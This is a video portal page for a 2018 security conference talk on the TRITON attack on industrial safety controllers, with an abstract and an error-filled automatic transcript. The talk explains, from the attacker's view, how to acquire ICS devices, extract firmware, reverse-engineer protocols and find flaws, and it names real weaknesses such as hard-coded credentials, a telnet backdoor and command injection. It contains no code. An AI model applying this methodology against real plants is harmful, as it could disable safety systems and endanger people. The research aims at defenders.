Thru the Eyes of the Attacker: Designing Embedded Systems for ICS

Video thumbnail (Frame 0) Video thumbnail (Frame 1395) Video thumbnail (Frame 5657) Video thumbnail (Frame 6865) Video thumbnail (Frame 8946) Video thumbnail (Frame 10565) Video thumbnail (Frame 13058) Video thumbnail (Frame 14333) Video thumbnail (Frame 15979) Video thumbnail (Frame 17997) Video thumbnail (Frame 21934) Video thumbnail (Frame 23402) Video thumbnail (Frame 25129) Video thumbnail (Frame 28340) Video thumbnail (Frame 30526) Video thumbnail (Frame 32007) Video thumbnail (Frame 33341) Video thumbnail (Frame 34550) Video thumbnail (Frame 35878) Video thumbnail (Frame 37630) Video thumbnail (Frame 39032) Video thumbnail (Frame 41576) Video thumbnail (Frame 42847) Video thumbnail (Frame 44233) Video thumbnail (Frame 45626) Video thumbnail (Frame 50774) Video thumbnail (Frame 52266) Video thumbnail (Frame 53437) Video thumbnail (Frame 54633) Video thumbnail (Frame 55862) Video thumbnail (Frame 57506) Video thumbnail (Frame 59647) Video thumbnail (Frame 61058) Video thumbnail (Frame 62087) Video thumbnail (Frame 63132) Video thumbnail (Frame 65510) Video thumbnail (Frame 66790) Video thumbnail (Frame 68186) Video thumbnail (Frame 69182) Video thumbnail (Frame 70707) Video thumbnail (Frame 76325)
Video in TIB AV-Portal: Thru the Eyes of the Attacker: Designing Embedded Systems for ICS

Formal Metadata

Title
Thru the Eyes of the Attacker: Designing Embedded Systems for ICS
Title of Series
Author
License
CC Attribution 3.0 Unported:
You are free to use, adapt and copy, distribute and transmit the work or content in adapted or unchanged form for any legal purpose as long as the work is attributed to the author in the manner specified by the author or licensor.
Identifiers
Publisher
Release Date
2018
Language
English

Content Metadata

Subject Area
Abstract
In 2017 a malware framework dubbed TRITON (also referred to as TRISIS or HatMan) was discovered targeting a petrochemical plant in Saudi Arabia. TRITON was designed to compromise the Schneider Electric Triconex line of Safety Instrumented Systems (SIS), potentially in order to cause physical damage. TRITON is the most complex publicly known ICS attack framework to date and the first publicly known one to target safety controllers. While the functionality of the malware is understood, little is known about the complexity of developing such an implant. The goal of this talk is to provide the audience with a “through the eyes of the attacker” experience in designing advanced embedded systems exploits & implants for Industrial Control Systems (ICS). Attendees will learn about the background of the TRITON incident, the process of reverse-engineering and exploiting ICS devices and developing implants and OT payloads as part of a cyber-physical attack and will be provided with details on real-world ICS vulnerabilities and implant strategies. In the first part of the talk we will provide an introduction to ICS attacks in general and the TRITON incident in particular. We will outline the danger of TRITON being repurposed by copycats and estimate the complexity and development cost of such offensive ICS capabilities. In the second and third parts of the talk we will discuss the process of exploiting ICS devices to achieve code execution and developing ICS implants and OT payloads. We will discuss real-world ICS vulnerabilities and present several implant scenarios such as arbitrary code execution backdoors (as used in TRITON), pin configuration attacks, protocol handler hooking to spoof monitored signal values, suppressing interrupts & alarm functionality, preventing implant removal and control logic restoration and achieving cross-boot persistence. We will discuss several possible OT payload scenarios and how these could be implemented on ICS devices such as the Triconex safety controllers. In the final part of the talk we'll wrap up our assessment of the complexity & cost of developing offensive ICS capabilities such as the TRITON attack and offer recommendations to defenders and ICS vendors.
Goodness of fit Roundness (object) Causality Different (Kate Ryan album) Multiplication sign Cybersex Physicalism System programming Independence (probability theory) Bit Information security
Slide rule Presentation of a group State of matter MIDI Set (mathematics) Price index Mass Revision control Latent heat Goodness of fit Robotics Hypermedia System programming Information security Task (computing) Algorithm Link (knot theory) Polar coordinate system Twin prime Software developer Electronic mailing list Physicalism Exploit (computer security) Process (computing) Maize Combinatory logic System programming Computer worm Reverse engineering
Game controller Code Multiplication sign Cybersex Mass Disk read-and-write head Computer programming Neuroinformatik Product (business) Embedded system Term (mathematics) Hypermedia Semiconductor memory Operator (mathematics) System programming Process (computing) Information Firmware Engineering physics Form (programming) Domain name Information Physicalism Computer Process (computing) Software Order (biology) Computer science Self-organization Quicksort
Domain name Point (geometry) Multiplication sign Control engineering Cybersex Trojanisches Pferd <Informatik> Electric power transmission Mathematics Type theory Basis <Mathematik> Military operation Operator (mathematics) System programming Hacker (term) Information security
Hazard (2005 film) Independence (probability theory) Mass Line (geometry) Explosion Process (computing) Malware Hypermedia Operator (mathematics) System programming Factory (trading post) System programming Liquid Pattern language Hacker (term) Condition number Control system
Game controller Workstation <Musikinstrument> Hazard (2005 film) Cybersex Computer network Line (geometry) Density of states Software maintenance Flow separation Interprozesskommunikation Usability Software System programming System programming Energy level Process (computing) Control system
Game controller Workstation <Musikinstrument> Scripting language Code Control engineering Data center Workstation <Musikinstrument> Code Trojanisches Pferd <Informatik> Interprozesskommunikation Malware Read-only memory Semiconductor memory Gastropod shell System programming Computer worm Right angle Remote procedure call Remote Access Service Communications protocol Backdoor (computing) Reading (process) Backdoor (computing)
Complex (psychology) User interface External rotation Moment (mathematics) Multiplication sign Control engineering Sign (mathematics) Crash (computing) System programming Energy level Process (computing) Communications protocol Backdoor (computing) Game controller Sound effect Physicalism Exploit (computer security) Type theory Explosion Process (computing) Personal digital assistant System programming Software testing Hacker (term) Communications protocol
State observer Game controller Presentation of a group Proxy server Dependent and independent variables State of matter Feedback Multiplication sign Control engineering Set (mathematics) Limit (category theory) Computer Number Measurement Component-based software engineering Different (Kate Ryan album) Operator (mathematics) System programming Directed set Software testing Process (computing) Task (computing) Control system Cybersex Game controller Pairwise comparison Dependent and independent variables State diagram Mapping Cycle (graph theory) Feedback State of matter Operator (mathematics) Physicalism Coordinate system Control flow Component-based software engineering Category of being Process (computing) System programming Cycle (graph theory) Diagram Programmschleife Task (computing) Computer worm
Functional (mathematics) Link (knot theory) State of matter Code Flash memory Time zone Exploit (computer security) Coordinate system Computer network Extreme programming Control flow Computer programming Exploit (computer security) Arm Software bug Function (mathematics) Telecommunication Order (biology) Logic Communications protocol Task (computing) Booting
Functional (mathematics) State of matter Feedback Source code Workstation <Musikinstrument> Control engineering Electronic program guide Directory service Open set Mereology Different (Kate Ryan album) Internetworking Software Core dump Energy level Diagram Process (computing) Website Stability theory Task (computing) Source code Vulnerability (computing) Information Server (computing) Software developer Control engineering Electronic mailing list Planning Computer network Mereology Directory service Exploit (computer security) File Transfer Protocol Open set Equivalence relation Process (computing) Internetworking Software Personal digital assistant Website Software testing Information security Hacker (term) Communications protocol Window
Proxy server Flash memory Electronic program guide Division (mathematics) Microcontroller Mathematical analysis Functional (mathematics) Side channel attack Time domain Planning Goodness of fit Hacker (term) Computer hardware Utility software Information Website Firmware Domain name Information Flash memory Cellular automaton Interface (computing) Electronic program guide Mathematical analysis Planning Microcontroller Functional (mathematics) Digital photography Process (computing) Programmer (hardware) Block diagram Personal digital assistant Interface (computing) Utility software Website Block (periodic table) Diagram Routing Firmware
Module (mathematics) Slide rule Befehlsprozessor Personal digital assistant Googol Computer hardware Flash memory Serial communication output Right angle
Server (computing) Enterprise architecture User interface Link (knot theory) Interior (topology) Model theory Microcontroller Function (mathematics) PowerPC Computer programming Packet Loss Concealment Non-volatile memory Radical (chemistry) Logic Modul <Datentyp> Bus (computing) Operating system Process (computing) output Firmware Error message Personal identification number Game controller Enterprise architecture Serial port Information management Link (knot theory) Consistency Serial communication Bit Cartesian coordinate system Power (physics) Database normalization Voting Befehlsprozessor Logic Function (mathematics) Telecommunication System programming output Firmware
Stapeldatei Functional (mathematics) Identifiability Serial port Code Differential (mechanical device) Control engineering Mathematical analysis Functional (mathematics) Semantics (computer science) Field (computer science) Packet Loss Concealment Sequence Mathematics Different (Kate Ryan album) Logic Matrix (mathematics) Entropie <Informationstheorie> Data structure Communications protocol Reverse engineering Pairwise comparison Firmware Condition number Serial port Stapeldatei Differential (mechanical device) Mathematical analysis Code Field (computer science) Bit Control flow Semantics (computer science) Packet Loss Concealment Sequence Functional (mathematics) Personal digital assistant Function (mathematics) Entropie <Informationstheorie> Pattern language Remote procedure call Whiteboard Communications protocol Data structure Reverse engineering Firmware
Slide rule Functional (mathematics) Game controller Code Texture mapping Workstation <Musikinstrument> Exploit (computer security) Binary code Mathematical analysis Semantics (computer science) Field (computer science) Encryption Extension (kinesiology) UDP <Protokoll> Data compression Surjective function Computer icon Workstation <Musikinstrument> Mapping Binary code Mathematical analysis Code Semantics (computer science) Functional (mathematics) Software Personal digital assistant Logic Function (mathematics) Telecommunication Encryption Communications protocol Reverse engineering Data compression
Authentication Default (computer science) Vulnerability (computing) Code Mathematical analysis Exploit (computer security) Code Parsing Parsing Type theory Type theory Personal digital assistant Right angle Communications protocol Communications protocol Firmware Vulnerability (computing) Reverse engineering Default (computer science)
Email Injektivität Serial port Code Control engineering Food energy Packet Loss Concealment Sign (mathematics) Interpreter (computing) Logic Process (computing) Data conversion Extension (kinesiology) Injektivität Email Food energy Packet Loss Concealment Process (computing) Telnet Interface (computing) Quantum Configuration space Right angle Writing Firmware Point (geometry) Reading (process) Game controller Password Barrelled space Writing Operator (mathematics) Telnet Software testing Configuration space Quantum Firmware Backdoor (computing) Form (programming) Authentication User interface Serial port Computer program Code Client (computing) Cartesian coordinate system File Transfer Protocol File Transfer Protocol Integrated development environment Personal digital assistant Analog-to-digital converter Password Interpreter (computing) Backdoor (computing) Communications protocol Extension (kinesiology)
Point (geometry) Functional (mathematics) Code View (database) Authentication Exploit (computer security) Microcontroller Spyware Computer programming Sign (mathematics) Insertion loss Computer worm Communications protocol Right angle Information security Vulnerability (computing) Buffer overflow Authentication Vulnerability (computing) Software developer Computer program Code Control flow Microcontroller Mathematics Logic Personal digital assistant Right angle Communications protocol Reverse engineering Firmware
Point (geometry) Slide rule Greatest element Game controller Functional (mathematics) Context awareness Injektivität Control engineering Computer programming Formal language Operating system Process (computing) Interrupt <Informatik> Maize Local ring Key (cryptography) Control engineering Software developer Computer program Code Cartesian coordinate system Computer programming Mathematics Befehlsprozessor Process (computing) Logic Personal digital assistant Interrupt <Informatik> Asynchronous Transfer Mode Computer worm
Enterprise architecture Enterprise architecture Arm Mapping Software developer PowerPC Arm Power (physics) Revision control PowerPC Different (Kate Ryan album) Personal digital assistant Revision control System programming Computer worm Atomic nucleus Computer worm
Run time (program lifecycle phase) Code View (database) Multiplication sign Control engineering File format PowerPC Stack (abstract data type) Side channel attack Virtual memory Strategy game Semiconductor memory Different (Kate Ryan album) Encryption Förderverein International Co-Operative Studies Data compression Cybersex File format Fitness function Connected space System programming Encryption Whiteboard Computer forensics Spacetime Reverse engineering Booting Firmware Data compression Point (geometry) Game controller Flash memory Scalability Field (computer science) 2 (number) Peripheral Read-only memory Software Gastropod shell Operating system Computer worm Spacetime Utility software Communications protocol Computer forensics Booting Firmware Game controller Multiplication Scaling (geometry) Key (cryptography) Control engineering Physical law Stack (abstract data type) Scalability Exploit (computer security) Software PowerPC Personal digital assistant Connectivity (graph theory) Video game Musical ensemble Backdoor (computing) Communications protocol Computer worm
Table (information) Structural load Code Multiplication sign Execution unit Branch (computer science) Arm Field (computer science) Area Medical imaging Semiconductor memory String (computer science) Software Interrupt <Informatik> Booting Firmware Hydraulic jump Address space Arm Code Intermediate value theorem Radical (chemistry) Vector space Interrupt <Informatik> Utility software Remote procedure call Table (information) Reverse engineering Address space Booting Firmware
Topology Table (information) Code Computer-generated imagery File format Arm Area Mach's principle Medical imaging Semiconductor memory String (computer science) Information Process (computing) Firmware Address space File format Computer program Code Control flow Complete metric space Functional (mathematics) Function (mathematics) Network topology Table (information) Reverse engineering Firmware Address space
Functional (mathematics) Game controller Module (mathematics) Run time (program lifecycle phase) Parsing Quantum state Control engineering Substitute good Peripheral Telecommunication Operator (mathematics) System programming Communications protocol Reverse engineering Information security Firmware Computer icon Parsing Quantum state Run time (program lifecycle phase) System call Substitute good Compiler Hexagon PowerPC Logic Function (mathematics) Telecommunication output Peripheral Information security Communications protocol Reverse engineering Disassembler Firmware
Asynchronous Transfer Mode Game controller Functional (mathematics) Consistency Data storage device Heat transfer Function (mathematics) Power (physics) Data management Voting Read-only memory Semiconductor memory Analogy Shared memory Bus (computing) System programming Process (computing) Message passing Task (computing) Control system Stability theory Digitizing Consistency Computer program Shared memory Heat transfer Computer network Data management Voting Software Logic Function (mathematics) Telecommunication System programming output Task (computing) Stability theory Asynchronous Transfer Mode Firmware
System call Installation art Structural load Control engineering Exploit (computer security) Parameter (computer programming) Magnetic stripe card Hooking Semiconductor memory Finite-state machine Computer worm Process (computing) Firmware Multiplication Address space Hydraulic jump Default (computer science) Installation art Area Source code Beta function Workstation <Musikinstrument> Control engineering Computer program Branch (computer science) Parameter (computer programming) Computer network Bit Control flow System call Inclusion map Explosion Malware Event horizon Software Logic System programming Software testing Finite-state machine Right angle Table (information) Backdoor (computing) Limit of a function Computer worm Firmware
Asynchronous Transfer Mode Game controller Key (cryptography) Consistency Control engineering Code Limit (category theory) Counting Explosion Carry (arithmetic) Read-only memory Semiconductor memory Network topology System programming System programming Computer worm Modul <Datentyp> Process (computing) Backdoor (computing) Firmware Writing Position operator Computer worm
Reading (process) Enterprise architecture Table (information) State of matter Model theory Microcontroller Function (mathematics) Route of administration Duality (mathematics) Uniformer Raum Semiconductor memory Computer worm Process (computing) Digital rights management Game controller Run time (program lifecycle phase) Computer program Translation (relic) Measurement Connected space Process (computing) Logic output Hill differential equation Modul <Datentyp> Table (information)
Point (geometry) Asynchronous Transfer Mode Nim-Spiel Multiplication sign Demo (music) Function (mathematics) Arm 2 (number) Mathematics Root Read-only memory Semiconductor memory Befehlsprozessor Gastropod shell output Exception handling Vulnerability (computing) Personal identification number Module (mathematics) Vulnerability (computing) Demo (music) Real number Control engineering Line (geometry) Connected space Inclusion map Befehlsprozessor Software Function (mathematics) output Right angle Musical ensemble Exception handling Routing Asynchronous Transfer Mode Computer worm
User interface State of matter View (database) Demo (music) Bound state Streaming media ACID Mass Product (business) Process (computing) Software Computer worm Right angle Local ring Computer worm
User interface Proxy server Code View (database) Water vapor Data storage device Field (computer science) Computer programming Measurement Data management Read-only memory Semiconductor memory Logic Energy level Computer worm Local ring Proxy server Salem, Illinois View (database) Block (periodic table) Control engineering Computer program Code Bit Functional (mathematics) Data management Logic Function (mathematics) output Block (periodic table) Computer worm
Enterprise architecture Stapeldatei Functional (mathematics) Link (knot theory) Computer program Electronic mailing list Code Water vapor PowerPC Reduced instruction set computing Computer programming Semiconductor memory Logic Right angle Resultant
Functional (mathematics) Raw image format Field (computer science) Revision control Arithmetic mean Process (computing) Befehlsprozessor Different (Kate Ryan album) Semiconductor memory System programming Computer worm Backdoor (computing) Firmware Writing Reading (process) Computer worm
Slide rule Asynchronous Transfer Mode Freeware Code Exploit (computer security) Function (mathematics) Mass Component-based software engineering Software Finitary relation Modul <Datentyp> System programming Computer worm Process (computing) Communications protocol Website Information security Metropolitan area network Task (computing) Workstation <Musikinstrument> Vulnerability (computing) Multiplication Scaling (geometry) Frustration Kolmogorov complexity Software developer Physical law Computer program Line (geometry) Control flow Electric power transmission Flow separation Exploit (computer security) Open set Type theory Database normalization Process (computing) Personal digital assistant Function (mathematics) Simplex algorithm output Game theory Information security Stability theory Computer worm Firmware
it's time to yesterday if you were in here we saw a Teddy Ruxpin get hacked and today we're gonna do something a little bit different we're gonna do power plants so this is going to be very exciting let's give Joss and morena a big round of applause good morning thank you so much to all of you for coming here so today we will be like we will present you like what did an effort what it takes to design embed it exploits to actually cause physical damage and industrial facility from the beginning to the end so briefly about ourselves I will let just to present yeah so my name is yall's Vettel's I'm an independent security researcher with midnight blue or I mainly focus on different kinds of embedded systems industrial control systems automotive IOT and I previously worked as a researcher at the University of critical
infrastructure security so in my name is marina Kurata Phil I've been doing my major of specialisation is physical damage and I've been doing it than eight
years I presented a lot of works with black hat and DEF corn and so how this combination of asses came together is on one hand Yas can reverse engineer and develop like exploits and implants for any embedded system in the world however like what exactly do you want to do on that device and I am my specialization hey here's this power plant chemical plant old traffic light system robotic system how exactly you want to cause physical damage so I will be design and engineer this exploitation scenario to cause physical damage and then at the end I will come up with a set of algorithms which need to be implemented and it was a long list of tasks which needs to be executed on that embedded system so visits wish list I would go to a guy like yours and say hey this is what I need to do on that device and maybe like somewhere we will also meet in between when they look at the design of the device like hey is the specific personal design features of the device can be probably used to accomplish like simultaneously several tasks so this is where we would be working together so this is how the combination came into place and so this is how we will be presenting the presentation so after the introduction and industrial control system and safety systems by the way how many of you've heard try turn and I hope that everybody good because that was our motivation we've also wanted to show like in the mass media this tritone exploit was like described as like so sophisticated like only state sponsor only few people and they will show you if it's really so so after the introduction we will go into the device exploitation because it's the end you need to obtain called execution on the device so after you have called execution then you start already developing for example implant like back doors like in payloads which actually targeted like designed for the physical damage and of course conclusions in the end is you already probably notice I'm speaking very fast and there is reason for that because the topic which we are presenting to you extremely complex but we still wanted to show you the process from the beginning to end and still of course without deep details and it's already a lot so it will be fast-paced talk however again the motivation was to show you the full process so that you could see it from the beginning to end and we will be posting even longer version of the slides after this talk because we have to cut out certain information and if you're interested you can go and review it again so introduction so what
are the industrial control systems well you probably all know but it's important to set up your vocabulary so that all of us operate for this talk operate on the same terms so industrial control systems those are computerized systems and network which control physical process so typically if you talk about industrial organization there will be corporate Network there will be another network which called SCADA or control network and even though this is the same look in computers one will be called information technology and another will be called operational technology overall team nevertheless that is still all computing devices and the guys who deal systems are studied typically something like computer science and as long as we are moving towards physical process this is already engineering science and it's completely different so they lower the closer we come into
the physical process the computing devices which actually monitor monitor and control physical process they look already like this and they call we typically know them as embedded systems so they don't have operating system as we know you as we know it's operating system which actually runs the device and execute the programs is called firmware and since these systems are real-time systems the entire firmware must be loaded and executed in the memory at all times so so on one head the attacker needs to execute code so the attack will be executed on this embedded system so it's still cyber domain in order to cause that physical damage and basically damage for example the machinery and operate the machinery as needed and so when for example when the attacker is like going into there like penetrating financial sector his goal is to steal money in some form so when the attack has penetrated the industrial network his goal is to cause some sort of form of physical damage in the physical domain it could be also economic damage like spoiling the product however in the mass media typically this physical damage is depicted as a big explosion so I see
eslint threat landscape has changed in the past eight years so I started doing this type of security before it was fashionable and nobody knew about it well like an IT domain there was a crazy amount of hacking happening all the time like industrial control systems lived in bubbles nobody knew about them and then
Stuxnet has happened so it's simply be like Stuxnet was kind of a trigger and a tipping point because we started seeing more and more publicly known as peonage attacks and some ways like we started seeing first publicly known like activities related also ready to recon of the operational technologist system so and from 2015 that started to happen and so there was to power grid attacks in 15 and 16 and in 17 basically it did it was announced at the end of 2017 triton has happened but it was attack i tried to install backdoor or remote access trojan on a safety controller and it was a big thing because it's it was
picked up by pretty much every mass media including wall street journal's which said that that is very very very alarming situation and why was triton is so special because it does targeted
safety instrumented system so what does it mean exactly for us physical processes are inherently hazardous so it means that there is like like toxic flammable liquids fires and explosions electrical hazard moving pattern there machinery so there are a lot of layers of safety protections to prevent harm or maybe even casualties to humans first of all and secondly to prevent environmental damage and also machinery because it's expensive to kill in machinery so the rail layers of protection starting with the design of the process then we have a control loops then we have a human operator who can react to the alarm but as soon as like control system and human operator are no longer able to control the process in a safety manner we have so-called safety instrumented system that is independent control system which reacts on the hazardous condition and tries to prevent it so as you can see this is the last lane line of defense before hazardous accident is already happening so and the attacker was apparently was trying to disable to disable this system so that is actual attack on the civilian in civilians which is not good so
previously so safety instrumented system our software system and because it is the line line the line of defense typically it is it is recommended that they would be run on the isolated and segmented Network but for ease of design and for ease of maintenance they often are connected together to the main control system and so and that allows the attacker to obtain remote access to safety instrumented systems so and they that was the trike Onix from Schneider and it
is a very critical safety instrumented system of safety integrated level 3 which is only 2% of all hazardous situation for example in oil is of that severity so it's very critical safety
systems trike Onix is everywhere for example you could find it on the swimming shapes and so on so the
attacker obtain remote access to the engineering station which was connected to the safety controller so they got ability to communicate to safety controllers and what an attacker
attempted to inject a passive backdoor or some people refer to it as a remote access Trojan which would allow attacker to read arbitrary memory right into the memory for example shell code for the attack and then they execute that code
so now so even if you have the backdoor it really means nothing to you because I mean unless you know what you want to achieve in the plant the backdoor is actually absolutely useless and harmless so attack scenario depends on attacker goal and sometimes it means explosion but in most cases it does not because you don't need to over engineer if you just want to send a warning sign to your enemy or whatnot and like some you can't
achieve some simple like attacks like do not press there are certain buttons on that you might which have so descriptive like stop start you can press it and you achieve some effect but you know that is not a lot long-lasting effect like yes the first type of physical attacks will happen in at the HMI then the attackers moves their exploits for example in destroy or crash overwrite they were executing the attack already at the level of the industrial protocols but now we have Trident which is already on the embedded system so what's going on why the attack is already moving their exploits into the embedded systems and we will explain so internal processes are very complicated and they actually build inherently and designed to be robust and recoverable so if the attacker wants to achieve any significant long-lasting damage they actually need to obtain very specific process like very detailed process comprehension the design the dynamic behavior of the process physics and so on so for example like what causes the pipe to explode well what causes the right pipe to explode and then what causes the right pipeline to explode at the right time and suddenly the complexity is increasing so industrial
control systems operate on the control loop principles so control systems and human operators they use sensors to observe the state in the process and then control system compute the commands to instruct actuators to control the process and bring it into the right state so in a nutshell when the attacker is start designing engineer or engineering damage scenario there are huge number of tests which he has to accomplish I mean like starting from of course manipulating the process but then the attacker needs also to obtain a feedback loop to know whether the process is moving into the right state and he is successful I've been doing this for many many years and I've designed a lot of damage daenerys and I can tell you that obtaining feedback Lucas was one of the most hardest tasks to achieve because mostly sensors which are installed there in the plant they're useful because the attack is something always weird and they are not the plant was not designed to measure something weird going on so you have to do it indirectly and of course because you are trying to bring the process into the wrong stage in the harmful State the control system and human operators and safety they will try to fight you back and to bring protists back into the normal state so the attack I also have to prevent the response and Triton falls into this category prevent in response because they wanted to prevent response from the safety systems so in a nutshell the cyber physical attack or damaging attack that will be a collection of clandestine control loops because the attacker is becoming a control system and you have to have this cycle of observation and manipulations to achieve and safe state so attack timing is crucial so because process is not vulnerable at all time so you have to find that vulnerable time and when the attack has to be executed as a puted that tak coordination is critical as you have seen there have been a lot of tasks and for example observation is of state 8 and component by component B needs to trigger payload XYZ so this requires very granular control across the entire process and to manage like tasks quantity and timing so there was a very nice presentation even though I've been presenting on that topic a lot of times like many times so there have been a nice presentation from Jason Larson who decided to compare different damage scenarios and he came up with this timing instead the state diagram where he divided all the control damage task in into the damage scenario the different tasks where he also tried to
map like hey this is a set of tasks which I need to execute how do I map them now to the different device and to different implants and so basically as
soon as you as amount of task which you need to execute to achieve damage has become enlarged you need to have an implant because like it's giving separate tasks is will you will not be able to coordinate them so and this also allows you it allows you actually to coordinate so you can easily then install the coordination between the implant via the communication links or you can implement the routine to detect specific state so and it's also much more stealthy because you don't have like anomalistic do not create create an anomalous network traffic so but before like in order to actually achieve this to implement and implant you first have to exploit the device and you better
enjoy extreme programming because those device are extremely small have very limited resources they packed with the functionality so you first have to actually find something what device does not need eliminated so that you could put your actual exploitation code so at
the end Jason came up with this diagram where he has like put his core and different tasks and he compared the reliability because it's not only the reliability of the attack scenario but it's also reliability of your exploit or implant on the device and so basically it kind of you have to find this trade-off like what is the most reliable attacks implant and attack damage scenario and implant stability so now after this long introduction I am giving back to yours and he will walk you through the device exploitation and design and like basically implemented so now I have my wish list of tasks and I'm giving it to him to implement all right Thank You marina so before we can do all this yeah so before we can get you know to the cool stage where things are actually exploding we'll have to get to another
cool stage which is exploiting the device and basically the process is as follows and I'll walk through these steps and we start by obtaining the necessary material so we need a couple of things before we can devise an exploit and an implant and the first thing we'll need is documentation and a lot of it you know developers guide planning and installation manuals all that kind of stuff and yeah in the case of tri connects it was very useful that these things are safety certified at a certain level and that means that all of the documents were available on the website of the US Nuclear Regulatory Commission so very detailed information was out there in other cases you might have to buy it but this is the first step you go about then the second step is obtaining the engineering software so these devices they're connected to a workstation running I don't know Windows XP with some software that is used to program them and this software usually contains the functionality for talking to this device and the protocol so you want to take a look at so you obtain this by just going to the vendor website or asking them nicely which is the easiest route or if you have already compromised asset owner networks you might take it from their own network because you're in there already so why not grab a souvenir or you might go to the various sketchy sources on the internet like eBay or Alibaba or open directories hosting this kind of stuff so you know it's usually relatively easy to combine in the case of try connects we found a try station software for the equivalent of three u.s. dollars on some Chinese website so yeah that was relatively easy and then we have to obtain the device and that's a little trickier because you're not gonna find that kind of stuff at a yard sale or in a corner shop or whatever it's very expensive and you might have to buy multiple multiple copies because you might have to do a teardown or you might break a device etc etc so ideally you buy it directly from the vendor but if you're a nation state sponsored attacker you don't maybe want to directly do that so you need strong men or you buy it at a bankruptcy auction or again eBay or Alibaba or your friend so here you can see I'm not sure if it's yeah it's all coming up it's relatively expensive in most cases a couple of thousand bucks for one of these controllers and you need multiple parts to put the whole thing together so it's not you know very
cheap then you need to obtain the device firmware the stuff that runs on the device itself so your various options here you can sometimes download it from the vendor websites or extract it from some update utility that's that's the easy approaches or you might have to extract it from the flash chip on the device itself go to hardware hacking route and this can become very complicated because in a worst case scenario you'll have encrypted firmware you'll have chip readout protection you need to bypass it and do side-channel attacks and all the kind of stuff but for tracking X that was not necessary because there was no readout protection on the flash you could just T solder it put it into an adapter and use a universal cell your programmer and you'd be good or you could just get it from
the firmware update utility which also holds it also you you know the second step you have to do is usually device teardown in PCB analysis so we need info on what kind of microcontroller is on this device we need the device functional domains so what is happening where on this device we need to know about interesting interfaces like URJ tech what-have-you and sometimes we're lucky if it's an FCC certified device you have an FCC ID and you got like internal photos and documentation on the FCC website sometimes other people have done your job for you and you have public tear downs and that's very nice in the case of try connects the planning and installation guide has very detailed internal block diagrams and that helps a lot because you know that that prevents you from or saves you the effort of opening it up but in some cases were not so lucky and we will have to do tear downs and now people who don't come from
a hardware hacking background they're usually terrified of it but it's not that complicated in most cases you know like the picture shows its RAM flash or you google it and and there is this this
persistent narrative that you know especially among some ot people that you know ICS devices they're all different and operational technology it's not like yeah the embedded devices you're used to but for our purposes it's like all the IOT devices out there that are getting hacked by the billions every day for
example take these two these two PLC's by Schneider Electric the modak on em two three eight and three through em 340 usually you have a central processor module which does all the heavy lifting and you have a couple of input/output modules which you stitch on to it the side as you can see on the right of the slide you might have an integrated Ethernet connector as you can see on the right example or maybe you have a dedicated module that does the Ethernet stuff and then connects to the main module over serial link and internally
they typically look something like this so you have a couple of i/o pins you got your serial link or Ethernet link or whatever and then you have a microcontroller in the middle and typically this microcontroller will run the main firmware which has the operating system and some of the application stuff like maybe a webserver and have to be server or whatever and then you typically have a logic handling chip which might be an FPGA or another microcontroller executing the actual programs that this thing is it's configured and programmed then now this might differ between PLC's because you know this is a generalization but it roughly comes down to something like this and for track and X it looks like this so you have three main processors and they communicate over try bus which is an internal bus that does some voting on input values for consistency and as a triple modular redundancy architecture to ensure that you know a vote of two out of three overrides any errors that are introduced there yeah that's that's
basically what it looks like the main processor and there you have it it runs a PowerPC chip and you have a dedicated outer chip for in input/output and communication stuff and we'll delve into this a little bit later when it becomes relevant so the first thing you want to
look at for most ICS stuff is reverse engineering of all the protocols they talk to because in many cases these are legacy and proprietary protocols usually ports of all serial protocols that have been retrofitted onto Ethernet they control very sends the functionality like starting and stopping the plc updating the firmware and so on and you might find a way to get into device itself by remote code execution here and that's what we want so the first thing we need to know when encountering a protocol we didn't know is knowing the packet structure and the semantics so we
can do this in a couple of ways and you know this is this is a very quick generalization but usually you go about comparing it to functionally similar protocols that have been documented so if it's board of an old serial protocol maybe take a look at you know what that looked like and what you can recognize in there test for common encoding structures like TLV sequential identifiers checksums any entropic analysis for fields that integrate and indicate cryptographic functionality or you might want to do differential analysis of functional batches of packets so you have like one packet that corresponds to starting the plc one that corresponds to stopping the plc in different kind of conditions and then see what kind of bit fields in the packets change and what you can make of that and like Rob's the voice that believe it or not if you stare at the hag's tons long enough you start to see the patterns and that is definitely true for pcap only analysis as you can see here it's basically like looking at the matrix now ideally you want to assist
this this traffic only analysis with binary reverse engineering because you wanted your reconstruction to be complete and sound you want to write a reliable exploit not because you don't want to things up but because you don't want to things up for yourself so a pickup only analysis can be incomplete inaccurate or opaque you know you can have undocumented or rare behavior that you don't see in the field but that's in there and you're interested in you might guess at semantics that might not actually be what you think it is there might be encryption compression bla bla bla bla bla and most importantly pick up only analysis damages your sanity so you want to do some binary reverse engineering which does that to a lesser extent so in
the case of try connects the try station software has a communications DLL and this has all the juicy stuff we need it's a single DLL in the engineering software and it has debug symbols so that greatly eases our life and as you can see on the slide I hope it's it's visible basically all these functions they have a good semantic mapping between the functionality it does like starting the PLC stopping the PLC downloading the control logic and the function code within the protocol itself so you can relatively easily identify all that functionality and you can see that the attacker probably went about it this way now the benefit for attackers
is that you don't need to fully reverse-engineer the protocol you only need to understand a few interesting packet types because we don't want to craft a full protocol parser we want to craft an exploit so I don't care about all all the rest I care about like that that one packet type that does the good stuff now when it comes to vulnerability
discovery which is typically the step that that comes after this the next step is getting code execution right and I this is a pre authentication vulnerability as well see preauth is a relative concept in the ICS world and in many cases ICS vulnerabilities are often a byproduct of the reverse engineering so you won't need to go about in most cases about fuzzing or static analysis of the firmware in many cases it's insecure by default there's angel ancient legacy shet everywhere and you shake a stick at it and vulnerabilities fall out so let me briefly drink something so an example of
this for example is the moxa and port serial to Ethernet Wi-Fi converter you plug a serial cable and converts it to Ethernet it has a web interface with broken authentication so it hashes on the client-side that's good once you're in you can do command injection in the ping test form so you got your code execution right there our example the opto energy monitoring and control device used in fairly sensitive environments it's got FTP it's got a proprietary protocol without authentication now the thing is you can configure FTP with a password you can enable an IP filtering all that kind of stuff but then you can use this unauthenticated proprietary protocol to disable IP filtering and able FTP and ask the credentials nicely you know and then you get them and you can use the FTP to upload a new piece of firmer and reflash the device over FTP and there's no firmer signing so again that's easy code execution right there in our example in case you you're not believe me at the modicum quantum PLC that's a large PLC for process applications it has FTP with hard-coded credentials which allows you to read and write configuration firmware what what have you it has a telnet with a hard coded backdoor and that's actually a C interpreter which you know it's nice it also has an unauthenticated proprietary Modbus extension for starting and stopping the plc overriding the programmable logic there's basically excellent ways to get code execution on this thing and finally to drive the point home on our serial to Ethernet converter by Advent ACK it has a web interface again and the nice thing is that if anyone unlocks the web interface on one PC let's say a legitimate operator it's disabled for everyone so you know and then you have a command injection in the email setup email alert setup form and again easy code execution right there I mean you get the idea it's
